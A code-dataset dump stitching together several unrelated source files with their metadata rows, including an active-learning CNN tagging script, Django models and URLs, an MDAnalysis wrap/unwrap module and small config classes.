filename="random.txt"
# Get hybrid index
if mode == "hybrid":
# least/most ratio is hardcoded
least_ratio = 1/3
most_ratio = 1 - least_ratio
# Compute hybrid indexing
query_index_least_rank = sequence_entropy_sort_index[:int(numSeqToQuery*(least_ratio))]
query_index_most_rank = sequence_entropy_sort_index[max((len(sequence_entropy_sort_index) - int(numSeqToQuery*(most_ratio))),0):]
value_to_return = np.concatenate((query_index_least_rank, query_index_most_rank), axis = -1)
filename="hybrid.txt"
# Store sequences in a file
if write_to_disk:
query_result_path = folder_path+"/"+"query_result"+"/"+filename
with open(query_result_path, "w", encoding = "utf-8") as f:
if verbose:
f.write("token target predicted entropy\r\r")
else:
f.write("-DOCSTART- -X- -X- o\r\r")
for i in value_to_return:
seq = X_w[i]
seq_offset = i*maxWords + seq_len - len(seq)
for j,w in enumerate(seq):
index = seq_offset + j
if verbose:
f.write(w + " " + true_flat[index] + " " + pred_flat[index] + " " + str(entropy_flat[index]) + "\r")
else:
if task == 1:
f.write(w + " " + true_flat[index] + " o o\r")
elif task == 2:
f.write(w + " o " + true_flat[index] + " o\r")
elif task == 3:
f.write(w + " o o " + true_flat[index] + "\r")
else:
raise Exception('Bad task given.')
f.write("\r")
print("CNN query has terminated!")
return value_to_return
def CNN_ActiveModel(task, X_train_w, X_test_w, X_valid_w, y_train_w, y_test_w, y_valid_w, tag_init_min_th, nbr_iters,
nbr_epochs, query_mode, inc_perc = 0.03, word_embedding_size = 100,
char_embedding_size = 50, pretrained_embedding="", folder_path="active_model", store_models = False):
"""
Active learning platform, which does multiple training cycles.
As a first step, preprocesses the data to unify digits under the same token and splits train set into labeled/unlabelled dataset.
Then, for each training cycle:
- Processes the data to get indices and features for the given iteration.
- Trains the model with the labeled dataset.
- Computes queries references from the unlabeled dataset.
- The queried references are removed from unlabeled dataset and appended to labeled dataset.
:param task: task on which active learning is done, must be one these values: "task1", "task2", "task3".
:param y_train_w: Data to train the model, in the format of load_data function (in utils.py).
:param y_train_w: Labels of the data to train the model, in the format of load_data function (in utils.py).
:param X_test_w: Data to test the model, in the format of load_data function (in utils.py).
:param y_test_w: Labels of the data to test the model, in the format of load_data function (in utils.py).
:param X_valid_w: Data to train the model, in the format of load_data function (in utils.py).
:param y_valid_w: Labels of the data to train the model, in the format of load_data function (in utils.py).
:param tag_init_min_th: Number of tokens for each label in the first training cycle. See splitTrainData for further information.
:param nbr_iters: Number of training cycles
:param nbr_epochs: Number of epochs for each training cycles. Early stopping is not allowed.
:param inc_perc: Percentage of sequences in X_train_w added at each iteration. Must be between 0 and 1.
:param query_mode: How references are queried. Must be "least", "most", "hybrid", or "random".
:param word_embedding_size: See CNN_model (in models.py).
:param char_embedding_size: See CNN_model (in models.py).
:param pretrained_embedding: See CNN_model (in models.py).
:param folder_path: Where results, data and weights of each iteration will be stored.
:param store_models: Store model weights and training dataset at each iteration
:return List with best F1 score at each training cycle.
"""
# Check parameters
assert(tag_init_min_th > 0)
assert(nbr_iters > 0)
assert(inc_perc > 0 and inc_perc <= 1)
if store_models:
if task.lower() == "task1" or task.lower() == "task2" or task.lower() == "task3":
pass
else:
# Must be a valid task: "task1", "task2", "task3"
print("Not a valid task.")
raise AssertionError
os.makedirs(folder_path, exist_ok=True)
file, stdout_original = setPrintToFile("{0}/log.txt".format(folder_path))
start_time = time.time()
# STEP 0: PREPROCESS DATA
print("Dataset creation and preprocessing.")
# Merge digits using a specific token
digits_word = "$NUM$"
X_train_w, X_test_w, X_valid_w = mergeDigits([X_train_w, X_test_w, X_valid_w], digits_word)
# Data split to get labelled and unlabelled data for first iteration
X_train_w_labelled, y_train_w_labelled, X_train_w_unlabelled, y_train_w_unlabelled = splitTrainData(X_train_w, y_train_w,
tag_init_min_th)
# Return values
f1_scores = []
for n_iter in range(nbr_iters):
# Iteration strings
print("\n --- ITERATION " + str(n_iter) + " ---\n")
iter_task = "iter_{0}".format(n_iter)
write_data_path = "{0}/iter_{1}/train_active.txt".format(folder_path, n_iter)
weights_path = "{0}/iter_{1}/iter_{1}.h5".format(folder_path, n_iter)
os.makedirs(folder_path+"/"+iter_task, exist_ok=True)
# STEP 1: PROCESS DATA
print("Dataset processing.")
# Store dataset if requested
if store_models:
with open(write_data_path, "w", encoding = "utf-8") as f:
f.write("-DOCSTART- -X- -X- o\r\r")
# Store least index rank
for index, (ref_words, ref_tags) in enumerate(zip(X_train_w_labelled, y_train_w_labelled)):
if index == 0:
continue
for w, t in zip(ref_words, ref_tags):
if task.lower() == "task1":
f.write(w + " " + t + " o o\r")
elif task.lower() == "task2":
f.write(w + " o " + t + " o\r")
elif task.lower() == "task3":
f.write(w + " o o " + t + " \r")
else:
raise AssertionError
f.write("\r")
# Compute indices for words+labels in the TRAINING data
print("Word counting")
ukn_words = "out-of-vocabulary" # Out-of-vocabulary words entry in the "words to index" dictionary
word2ind, ind2word = indexData_x(X_train_w_labelled, ukn_words)
print("Label counting")
label2ind, ind2label = indexData_y(y_train_w_labelled)
# Convert data into indices data
maxlen = max([len(xx) for xx in X_train_w_labelled])
padding_style = 'pre' # 'pre' or 'post': Style of the padding, in order to have sequence of the same size
# X padding
print("Input")
X_train = encodePadData_x(X_train_w_labelled, word2ind, maxlen, ukn_words, padding_style)
X_test = encodePadData_x(X_test_w, word2ind, maxlen, ukn_words, padding_style)
X_valid = encodePadData_x(X_valid_w, word2ind, maxlen, ukn_words, padding_style)
X_unlabelled = encodePadData_x(X_train_w_unlabelled, word2ind, maxlen, ukn_words, padding_style)
# y padding
print("Labels")
y_train = encodePadData_y(y_train_w_labelled, label2ind, maxlen, padding_style)
y_test = encodePadData_y(y_test_w, label2ind, maxlen, padding_style)
y_valid = encodePadData_y(y_valid_w, label2ind, maxlen, padding_style)
y_unlabelled = encodePadData_y(y_train_w_unlabelled, label2ind, maxlen, padding_style)
# Create the character level data
print("Characters")
char2ind, maxWords, maxChar = characterLevelIndex(X_train_w_labelled, digits_word)
X_train_char = characterLevelData(X_train_w_labelled, char2ind, maxWords, maxChar, digits_word, padding_style)
X_test_char = characterLevelData(X_test_w, char2ind, maxWords, maxChar, digits_word, padding_style)
X_valid_char = characterLevelData(X_valid_w, char2ind, maxWords, maxChar, digits_word, padding_style)
X_unlabelled_char = characterLevelData(y_train_w_unlabelled, char2ind, maxWords, maxChar, digits_word, padding_style)
# STEP 2: TRAIN MODEL
print("Model training.")
# Training parameters
batch_size = 128
# Train model
epoch, precision, recall, f1 = CNN_model(iter_task, True, [X_train, X_train_char], [X_test, X_test_char], word2ind, maxWords,
[y_train], [y_test], [ind2label], maxChar, char2ind, pretrained_embedding =
pretrained_embedding, word_embedding_size = word_embedding_size,
char_embedding_size = char_embedding_size, validation=False, nbr_epochs = nbr_epochs,
batch_size = batch_size, optimizer='rmsprop', early_stopping_patience=-1,
folder_path=folder_path)
f1_scores.append((epoch, f1))
# This was last iteration
if n_iter == (nbr_iters - 1):
print("Training finished.")
break
# There is no more data to label
if len(X_train_w_unlabelled) == 1 and X_train_w_unlabelled[0] == []:
print("No more data to add! Training finished at iteration " + str(n_iter))
break
# STEP 3: SCORE UNLABELLED DATA
print("Data scoring.")
# Number of entries to retrieve from unlabelled dataset, as a percentage of the whole training set.
num_labelled = len(X_train_w_labelled) - 1
num_unlabelled = len(X_train_w_unlabelled) - 1
toQuery = int(inc_perc * (num_labelled + num_unlabelled))
# Get score over sequence entropy
to_label_index = CNN_query(iter_task, X_train_w_unlabelled, [X_unlabelled, X_unlabelled_char], y_unlabelled,
toQuery, query_mode,
word2ind, maxWords, [ind2label], maxChar, char2ind,
pretrained_embedding = pretrained_embedding, word_embedding_size = word_embedding_size,
char_embedding_size = char_embedding_size, optimizer='rmsprop', write_to_disk = False,
folder_path=folder_path, print_to_file = False)
# I don't need weights anymore
# TODO: find a way to avoid writing/deletion on disk
if not store_models and os.path.isfile(weights_path):
os.remove(weights_path)
# STEP 4: SPLIT DATA AND APPEND NEW LABELLED DATA
print("Appending new data to train set.")
to_label_index_set = set(to_label_index)
to_label_w = []
to_label_tag = []
unlabelled_w = []
unlabelled_tag = []
# Split data
for i, seq in enumerate(X_train_w_unlabelled):
if i in to_label_index_set and i != 0:
to_label_w.append(X_train_w_unlabelled[i])
to_label_tag.append(y_train_w_unlabelled[i])
elif i != 0:
unlabelled_w.append(X_train_w_unlabelled[i])
unlabelled_tag.append(y_train_w_unlabelled[i])
X_train_w_labelled = X_train_w_labelled + to_label_w
y_train_w_labelled = y_train_w_labelled + to_label_tag
X_train_w_unlabelled = [[]] + unlabelled_w
y_train_w_unlabelled = [[]] + unlabelled_tag
num_labelled = len(X_train_w_labelled) - 1
num_unlabelled = len(X_train_w_unlabelled) - 1
print("Labelled data: " + str(num_labelled) + " entries.")
print("Unlabelled data: " + str(num_unlabelled) + " entries.")
print("Usage of full train set: ", str(num_labelled / (num_labelled + num_unlabelled)) + " %.")
# FINAL STEP: VALIDATION
print("Validation.")
CNN_model(iter_task, False, [X_train, X_train_char], [X_test, X_test_char], word2ind, maxWords,
[y_train], [y_test], [ind2label], maxChar, char2ind, word_embedding_size = word_embedding_size,
char_embedding_size = char_embedding_size, pretrained_embedding = pretrained_embedding, validation=True,
X_valid=[X_valid, X_valid_char], y_valid= [y_valid], folder_path=folder_path, gen_confusion_matrix=True)
end_time = time.time()
print("\n\nTotal training time: " + str(end_time - start_time) + " s.\n\n")
print("Best F1 scores: ", f1_scores)
closePrintToFile(file, stdout_original)
# Return list with best F1 scores of each iteration
return f1_scores
def splitTrainData(X_train_w, y_train_w, tag_min_threshold):
"""
Splits training dataset in two datasets, which we call "labeled" and "unlabeled" (it's just a convention, both datasets are actually labeled)
It ensures that the labeled dataset contains a minimum number of entries for each label in the full training dataset.
The function is used as an initialization for the first training iteration of the active learning model.
:param X_train_w: Data to train the model, in the format of load_data function (in utils.py).
:param y_train_w: Labels of the data to train the model, in the format of load_data function (in utils.py).
:param tag_min_threshold: Minimum number of tokens for each label in X_train_w.
:return Four lists: labeled data X, labeled data y, unlabeled data X, unlabeled data y.
"""
# dict { tag -> count in dataset }
tag_count = defaultdict(int)
# dict { tag -> indices of sequences that contain tag }
tag_index = defaultdict(set)
# dict { tag -> number of time it has been encountered }
tag_added = defaultdict(int)
# Histogram of tags
filled_categories = 0
for index, tag_seq in enumerate(y_train_w):
if index == 0:
continue
for tag in tag_seq:
tag_count[tag] += 1
tag_index[tag].add(index)
# Initialize indices of labelled and unlabelled datasets
X_train_unlabelled_index = set(range(len(X_train_w)))
X_train_labelled_index = set()
# Create labelled and unlabelled datasets
tag_count_sorted = sorted(tag_count.items(), key=operator.itemgetter(1))
for (tag, count) in tag_count_sorted:
for seq_index in tag_index[tag]:
if tag_added[tag] < tag_min_threshold:
if seq_index not in X_train_labelled_index:
X_train_labelled_index.add(seq_index)
X_train_unlabelled_index.remove(seq_index)
for curr_tag in y_train_w[seq_index]:
tag_added[curr_tag] += 1
else:
break
# Create labelled dataset
X_train_w_labelled = []
y_train_w_labelled = []
for ref_index in X_train_labelled_index:
if ref_index == 0:
continue
X_train_w_labelled.append(X_train_w[ref_index])
y_train_w_labelled.append(y_train_w[ref_index])
# Create unlabelled dataset
X_train_w_unlabelled = []
y_train_w_unlabelled = []
for ref_index in X_train_unlabelled_index:
if ref_index == 0:
continue
X_train_w_unlabelled.append(X_train_w[ref_index])
y_train_w_unlabelled.append(y_train_w[ref_index])
num_labelled = len(X_train_w_labelled)
num_unlabelled = len(X_train_w_unlabelled)
print("The dataset contains " + str(len(tag_count.keys())) + " labels.")
print("Number of labelled entries: ", num_labelled)
print("Number of unlabelled entries: ", num_unlabelled)
print("Usage of full train set: ", num_labelled / (num_labelled + num_unlabelled))
# Finalize the dataset by prepending an empty line (default convention for datasets)
X_train_w_labelled = [[]] + X_train_w_labelled
y_train_w_labelled = [[]] + y_train_w_labelled
X_train_w_unlabelled = [[]] + X_train_w_unlabelled
y_train_w_unlabelled = [[]] + y_train_w_unlabelled
return X_train_w_labelled, y_train_w_labelled, X_train_w_unlabelled, y_train_w_unlabelled
| 49.781837 | 149 | 0.642679 | 6,372 | 47,691 | 4.59479 | 0.0871 | 0.01578 | 0.010759 | 0.011613 | 0.737209 | 0.719892 | 0.705957 | 0.688811 | 0.671187 | 0.65206 | 0 | 0.011953 | 0.27198 | 47,691 | 958 | 150 | 49.781837 | 0.831308 | 0.337925 | 0 | 0.608611 | 0 | 0 | 0.056133 | 0.001753 | 0 | 0 | 0 | 0.001044 | 0.011742 | 1 | 0.011742 | false | 0.001957 | 0.041096 | 0 | 0.060665 | 0.072407 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
c5f341976dcff16eb86b4a3fc138156fa21c68a9 | 393 | py | Python | ffa/accounts/models.py | kschweizer/fresnofieldarchers | c044ff5bea66289124d23c4955454749029319e4 | [
"MIT"
] | null | null | null | ffa/accounts/models.py | kschweizer/fresnofieldarchers | c044ff5bea66289124d23c4955454749029319e4 | [
"MIT"
] | 7 | 2020-06-21T03:53:27.000Z | 2022-02-14T22:53:42.000Z | ffa/accounts/models.py | kschweizer/fresnofieldarchers | c044ff5bea66289124d23c4955454749029319e4 | [
"MIT"
] | null | null | null | from django.contrib.auth.models import AbstractUser
from django.db import models
import uuid
def user_email(instance, filename):
return 'users/user_{0}/{1}'.format(instance.user, filename)
# Create your models here.
class Member(AbstractUser):
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
avatar = models.ImageField(upload_to=user_email, blank=True) | 39.3 | 79 | 0.778626 | 55 | 393 | 5.472727 | 0.690909 | 0.066445 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008596 | 0.111959 | 393 | 10 | 80 | 39.3 | 0.853868 | 0.061069 | 0 | 0 | 0 | 0 | 0.048913 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.375 | 0.125 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 3 |
680d7be5c74ae7e121072f17cdb11a8624fc8c38 | 190 | py | Python | tests/__init__.py | tb0hdan/voiceplay | 3e35a25cfcf982a3871cf0d819bae4374ee31ecf | [
"Unlicense"
] | 2 | 2017-03-22T10:02:07.000Z | 2020-08-02T11:56:47.000Z | tests/__init__.py | tb0hdan/twigator_project | 775f213cff8b122c7e79b0cd420aeb814193e73e | [
"BSD-3-Clause"
] | 69 | 2016-12-10T22:27:47.000Z | 2017-12-14T05:15:43.000Z | tests/__init__.py | tb0hdan/twigator_project | 775f213cff8b122c7e79b0cd420aeb814193e73e | [
"BSD-3-Clause"
] | null | null | null | import unittest
def mytestrunner(tc):
alltests = unittest.TestSuite([unittest.TestLoader().loadTestsFromTestCase(s) for s in tc])
unittest.TextTestRunner(verbosity=2).run(alltests)
| 31.666667 | 95 | 0.773684 | 22 | 190 | 6.681818 | 0.727273 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005917 | 0.110526 | 190 | 5 | 96 | 38 | 0.863905 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.25 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3 |
680e4e8c42d7a6ebe0e085174eca520c345f7232 | 952 | py | Python | user/vistas/templates/votacion.py | ZerpaTechnology/occoa | a8c0bd2657bc058801a883109c0ec0d608d04ccc | [
"Apache-2.0"
] | null | null | null | user/vistas/templates/votacion.py | ZerpaTechnology/occoa | a8c0bd2657bc058801a883109c0ec0d608d04ccc | [
"Apache-2.0"
] | null | null | null | user/vistas/templates/votacion.py | ZerpaTechnology/occoa | a8c0bd2657bc058801a883109c0ec0d608d04ccc | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
print '''<!DOCTYPE html><html>'''
incluir(data,"head")
print '''<body class="container-fluid sin-marg pad-r08 pad-l08 ff">'''
incluir(data,"header")
print ''''''
incluir(data,"hero")
print '''<section class="row"><div class="col-md-12"><div class="text-center bg-ubuntu_jet"> <div> <input type="" name="" placeholder="Buscar votación"> </div></div><h1>Inscribete</h1><img src="'''
print data['base_url']+'static/imgs/marker/institucion-default.png'
print '''"><span> Nombre de la votación</span></div><form><label>Nombres: </label><input type="text" name="" placeholder="Nombre"><label>Apellidos: </label><input type="text" name="" placeholder="Nombre"><label>Foto de perfil: </label><input type="file" name="" placeholder="Nombre"><label>Expediente: </label><input type="text" name="" placeholder="Nombre"><input type="submit" name="" value="Registrarme"></form></section>'''
incluir(data,"footer")
print '''</body></html>'''
| 73.230769 | 427 | 0.677521 | 130 | 952 | 4.946154 | 0.507692 | 0.083981 | 0.087092 | 0.083981 | 0.197512 | 0.197512 | 0.197512 | 0.136858 | 0 | 0 | 0 | 0.010169 | 0.070378 | 952 | 12 | 428 | 79.333333 | 0.716384 | 0.022059 | 0 | 0 | 0 | 0.181818 | 0.82239 | 0.361679 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.636364 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 3 |
a83b4352002f5259f76291921bac626b9064a4c6 | 206 | py | Python | robotoy/components/searchlight.py | youwen5/robotoy | 3a7c8465cd332f520e911be654be2d2d54fa0ccb | [
"MIT"
] | null | null | null | robotoy/components/searchlight.py | youwen5/robotoy | 3a7c8465cd332f520e911be654be2d2d54fa0ccb | [
"MIT"
] | null | null | null | robotoy/components/searchlight.py | youwen5/robotoy | 3a7c8465cd332f520e911be654be2d2d54fa0ccb | [
"MIT"
] | null | null | null | from gpiozero import RGBLED
from . import pins
from ..singleton import singleton
@singleton
class SearchLight(RGBLED):
def __init__(self):
super().__init__(pins.LED_R, pins.LED_G, pins.LED_B)
| 20.6 | 60 | 0.737864 | 29 | 206 | 4.862069 | 0.551724 | 0.148936 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.165049 | 206 | 9 | 61 | 22.888889 | 0.819767 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.428571 | 0 | 0.714286 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
a84cbd734fb0adfbd3ccba3169f4eebe7b8d8fb8 | 171 | py | Python | Resources/Enums.py | HeroicosHM/NAUDiscordVerification | 93c46a9098228ffee24c90cc57fc9896ebaf0d34 | [
"MIT"
] | 1 | 2020-07-31T09:13:42.000Z | 2020-07-31T09:13:42.000Z | Resources/Enums.py | HeroicosHM/NAUDiscordVerification | 93c46a9098228ffee24c90cc57fc9896ebaf0d34 | [
"MIT"
] | null | null | null | Resources/Enums.py | HeroicosHM/NAUDiscordVerification | 93c46a9098228ffee24c90cc57fc9896ebaf0d34 | [
"MIT"
] | null | null | null | from enum import Enum
# Simple enum to force player type to either be casual or competitive
class PlayerType(Enum):
Casual = 'casual'
Competitive = 'competitive'
| 24.428571 | 69 | 0.74269 | 23 | 171 | 5.521739 | 0.652174 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.19883 | 171 | 6 | 70 | 28.5 | 0.927007 | 0.391813 | 0 | 0 | 0 | 0 | 0.166667 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 3 |
a865a5db1f3090d86d004389554eb2824ef0a3e0 | 202 | py | Python | rest/rest/urls.py | piwnk/ecb-currencies-fetch | 77a8630d0a54854d2b475ac05580ebb9ec4406c3 | [
"MIT"
] | null | null | null | rest/rest/urls.py | piwnk/ecb-currencies-fetch | 77a8630d0a54854d2b475ac05580ebb9ec4406c3 | [
"MIT"
] | null | null | null | rest/rest/urls.py | piwnk/ecb-currencies-fetch | 77a8630d0a54854d2b475ac05580ebb9ec4406c3 | [
"MIT"
] | null | null | null | from django.contrib import admin
from django.urls import path, include
from restapp import views
urlpatterns = [
path('admin/', admin.site.urls),
path('', include('restapp.urls')),
]
| 20.2 | 39 | 0.673267 | 25 | 202 | 5.44 | 0.48 | 0.147059 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.19802 | 202 | 9 | 40 | 22.444444 | 0.839506 | 0 | 0 | 0 | 0 | 0 | 0.093264 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.428571 | 0 | 0.428571 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
a88d852fd42c47800b549b9625af15e65db5627c | 4,580 | py | Python | venv/lib/python3.7/site-packages/MDAnalysis/transformations/wrap.py | dtklinh/GBRDE | c87fada492f24943d7d6b6ecda61c67f41d5bf83 | [
"MIT"
] | 2 | 2021-03-04T16:57:06.000Z | 2021-08-11T01:42:29.000Z | venv/lib/python3.7/site-packages/MDAnalysis/transformations/wrap.py | dtklinh/GBRDE | c87fada492f24943d7d6b6ecda61c67f41d5bf83 | [
"MIT"
] | null | null | null | venv/lib/python3.7/site-packages/MDAnalysis/transformations/wrap.py | dtklinh/GBRDE | c87fada492f24943d7d6b6ecda61c67f41d5bf83 | [
"MIT"
] | null | null | null | # -*- Mode: python; tab-width: 4; indent-tabs-mode:nil; coding:utf-8 -*-
# vim: tabstop=4 expandtab shiftwidth=4 softtabstop=4
#
# MDAnalysis --- https://www.mdanalysis.org
# Copyright (c) 2006-2017 The MDAnalysis Development Team and contributors
# (see the file AUTHORS for the full list of names)
#
# Released under the GNU Public Licence, v2 or any higher version
#
# Please cite your use of MDAnalysis in published work:
#
# R. J. Gowers, M. Linke, J. Barnoud, T. J. E. Reddy, M. N. Melo, S. L. Seyler,
# D. L. Dotson, J. Domanski, S. Buchoux, I. M. Kenney, and O. Beckstein.
# MDAnalysis: A Python package for the rapid analysis of molecular dynamics
# simulations. In S. Benthall and S. Rostrup editors, Proceedings of the 15th
# Python in Science Conference, pages 102-109, Austin, TX, 2016. SciPy.
#
# N. Michaud-Agrawal, E. J. Denning, T. B. Woolf, and O. Beckstein.
# MDAnalysis: A Toolkit for the Analysis of Molecular Dynamics Simulations.
# J. Comput. Chem. 32 (2011), 2319--2327, doi:10.1002/jcc.21787
#
"""\
Wrap/unwrap transformations --- :mod:`MDAnalysis.transformations.wrap`
======================================================================
Wrap/unwrap the atoms of a given AtomGroup in the unit cell. :func:`wrap`
translates the atoms back in the unit cell. :func:`unwrap` translates the
atoms of each molecule so that bons don't split over images.
.. autofunction:: wrap
.. autofunction:: unwrap
"""
from __future__ import absolute_import
from ..lib._cutil import make_whole
def wrap(ag, compound='atoms'):
"""
Shift the contents of a given AtomGroup back into the unit cell. ::
+-----------+ +-----------+
| | | |
| 3 | 6 | 6 3 |
| ! | ! | ! ! |
| 1-2-|-5-8 -> |-5-8 1-2-|
| ! | ! | ! ! |
| 4 | 7 | 7 4 |
| | | |
+-----------+ +-----------+
Example
-------
.. code-block:: python
ag = u.atoms
transform = mda.transformations.wrap(ag)
u.trajectory.add_transformations(transform)
Parameters
----------
ag: Atomgroup
Atomgroup to be wrapped in the unit cell
compound : {'atoms', 'group', 'residues', 'segments', 'fragments'}, optional
The group which will be kept together through the shifting process.
Notes
-----
When specifying a `compound`, the translation is calculated based on
each compound. The same translation is applied to all atoms
within this compound, meaning it will not be broken by the shift.
This might however mean that not all atoms from the compound are
inside the unit cell, but rather the center of the compound is.
Returns
-------
MDAnalysis.coordinates.base.Timestep
"""
def wrapped(ts):
ag.wrap(compound=compound)
return ts
return wrapped
def unwrap(ag):
"""
Move all atoms in an AtomGroup so that bonds don't split over images
Atom positions are modified in place.
This function is most useful when atoms have been packed into the primary
unit cell, causing breaks mid molecule, with the molecule then appearing
on either side of the unit cell. This is problematic for operations
such as calculating the center of mass of the molecule. ::
+-----------+ +-----------+
| | | |
| 6 3 | | 3 | 6
| ! ! | | ! | !
|-5-8 1-2-| -> | 1-2-|-5-8
| ! ! | | ! | !
| 7 4 | | 4 | 7
| | | |
+-----------+ +-----------+
Example
-------
.. code-block:: python
ag = u.atoms
transform = mda.transformations.unwrap(ag)
u.trajectory.add_transformations(transform)
Parameters
----------
atomgroup : AtomGroup
The :class:`MDAnalysis.core.groups.AtomGroup` to work with.
The positions of this are modified in place.
Returns
-------
MDAnalysis.coordinates.base.Timestep
"""
try:
ag.fragments
except AttributeError:
raise AttributeError("{} has no fragments".format(ag))
def wrapped(ts):
for frag in ag.fragments:
make_whole(frag)
return ts
return wrapped
| 30.738255 | 80 | 0.54345 | 529 | 4,580 | 4.6862 | 0.47448 | 0.02259 | 0.026624 | 0.015732 | 0.19766 | 0.086325 | 0.086325 | 0.045986 | 0.045986 | 0.045986 | 0 | 0.026705 | 0.321397 | 4,580 | 148 | 81 | 30.945946 | 0.770914 | 0.802402 | 0 | 0.352941 | 0 | 0 | 0.04428 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.235294 | false | 0 | 0.117647 | 0 | 0.588235 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 3 |
a8965f62e72384c8b9369d29d715fa8ae7318a10 | 226 | py | Python | checkout/urls.py | mahanfarzaneh2000/DjangoEcommerce | f844f60fd4eac6c7513196037cd908df3ba01983 | [
"CC0-1.0"
] | 1 | 2020-11-01T11:35:12.000Z | 2020-11-01T11:35:12.000Z | checkout/urls.py | mahanfarzaneh2000/DjangoEcommerce | f844f60fd4eac6c7513196037cd908df3ba01983 | [
"CC0-1.0"
] | null | null | null | checkout/urls.py | mahanfarzaneh2000/DjangoEcommerce | f844f60fd4eac6c7513196037cd908df3ba01983 | [
"CC0-1.0"
] | null | null | null | from django.urls import path
from .views import CheckoutView , SubmitPromoView
urlpatterns = [
path('', CheckoutView.as_view() , name='checkout'),
path('Promo-submit',SubmitPromoView.as_view(),name ='promo-submit'),
] | 32.285714 | 72 | 0.725664 | 26 | 226 | 6.230769 | 0.576923 | 0.074074 | 0.123457 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.123894 | 226 | 7 | 73 | 32.285714 | 0.818182 | 0 | 0 | 0 | 0 | 0 | 0.140969 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 3 |
a8b0b0058eb68a0f7f90fbc17bd3044ac1982af6 | 202 | py | Python | tractseg/experiments/dm_reg_lowres.py | inaccel/TractSeg | cc9feefd71ba9fcfacc4d3a7656f1a77bab9a287 | [
"Apache-2.0"
] | 148 | 2017-11-09T10:28:15.000Z | 2022-03-30T16:45:24.000Z | tractseg/experiments/dm_reg_lowres.py | inaccel/TractSeg | cc9feefd71ba9fcfacc4d3a7656f1a77bab9a287 | [
"Apache-2.0"
] | 170 | 2018-06-25T17:33:27.000Z | 2022-03-17T12:42:21.000Z | tractseg/experiments/dm_reg_lowres.py | inaccel/TractSeg | cc9feefd71ba9fcfacc4d3a7656f1a77bab9a287 | [
"Apache-2.0"
] | 57 | 2018-05-21T00:10:56.000Z | 2022-03-30T02:56:39.000Z |
from tractseg.experiments.base_legacy.dm_reg_legacy import Config as DmRegConfig
class Config(DmRegConfig):
DATASET = "HCP_32g"
RESOLUTION = "2.5mm"
FEATURES_FILENAME = "32g_25mm_peaks"
